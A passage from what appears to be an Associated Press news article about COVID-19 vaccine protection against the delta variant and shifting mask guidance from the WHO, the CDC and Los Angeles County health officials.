Experts say the Moderna vaccine, the same type as Pfizer’s, should be similarly protective. Johnson & Johnson still is studying how its one-dose vaccine fares against the variant. The company notes its shot does protect against a different worrisome mutant — the so-called beta variant that emerged in South Africa and is still considered the biggest challenge for today’s COVID-19 vaccines.
WHAT ABOUT MASKS?
The WHO has urged governments not to lift pandemic restrictions too quickly — including saying everyone, even the vaccinated, should continue to wear masks given that the delta variant spreads more easily and no vaccine is 100% effective.
In the U.S., the CDC maintains it still is safe for the fully vaccinated to go mask-free. But there’s no way to know if maskless people really are vaccinated and local governments can set tighter guidelines. This week, with the delta variant spreading locally, health officials in Los Angeles County said they still recommend masks indoors in public places for everyone.
If that’s confusing, consider that the more the virus is spreading in a particular area, the more risk even the vaccinated have of getting a mild or asymptomatic infection they could spread to someone not protected — such as children too young to qualify for the shots.
In Missouri, fully vaccinated Babcock makes sure she has a mask to pop on quickly if she runs into a crowd: “I feel like my new normal is holding a mask in my hand, ready to put it on if I need it.”
___
Associated Press writers Maria Cheng in London and Aniruddha Ghosal in New Delhi contributed to this report.
___
The Associated Press Health and Science Department receives support from the Howard Hughes Medical Institute’s Department of Science Education. The AP is solely responsible for all content.